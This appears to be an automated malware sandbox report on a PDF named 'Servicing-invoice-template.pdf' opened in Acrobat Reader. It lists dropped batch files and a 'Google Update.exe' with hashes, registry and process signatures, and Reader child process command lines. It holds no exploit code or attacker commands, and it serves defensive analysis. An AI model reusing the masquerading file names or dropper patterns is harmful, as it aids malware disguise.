memory/2720-31-0x0000000073ED0000-0x00000000745BE000-memory.dmp

memory/2708-32-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7B57.tmp.bat

MD5 10313b055491c488dced60caddafb571
SHA1 3fe476c1cdc9036bc99f35123badd79d6941ab45
SHA256 9b9e4730d0a8bba065f533a0ebd4d6d062fcbfc9690bb8901ec45bfc4c75c352
SHA512 00d6a7b1a7bce457354357662071d08e10afb56094a574ba65f62ca0a3acafe7c77b80c9a4720ab135d5245bcebdaaa217cb81418dd111a8a875c30f76c67f7b

C:\Users\Admin\AppData\Roaming\Google Update.exe

MD5 91c9ae9c9a17a9db5e08b120e668c74c
SHA1 50770954c1ceb0bb6f1d5d3f2de2a0a065773723
SHA256 e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
SHA512 ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e

C:\Users\Admin\AppData\Local\Temp\tmp819E.tmp.bat

MD5 168931cc13b197f0babad9cb74bdc699
SHA1 cf945a0e69e6b782bceff0d5f295b1e43f246230
SHA256 447afe31bbd185a63d794c73b0c81c25eacfd297ca454a1a956c61e39e9ad16a
SHA512 23df1fff1e7e0611c72614021f86ce284d8e457af855f60d2edf21cecb95fc0526aa241c1b6126c75536829bc68b29fb26704211f089cf32753047d142a5e985

memory/2708-52-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

memory/284-57-0x00000000008C0000-0x00000000008D8000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 4624 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 224 wrote to memory of 4624 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 224 wrote to memory of 4624 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EAAD656E9D4C73E718B1FA08A3860A89 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=12CCCDAA9BB66E63950CE1DA200ABCE4 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=12CCCDAA9BB66E63950CE1DA200ABCE4 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=40B9D9A3289D1FC6F7B8EE0EAB02FD70 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=70D905C0A244EDFA2CF80C735A0C2788 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=70D905C0A244EDFA2CF80C735A0C2788 --renderer-client-id=5 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

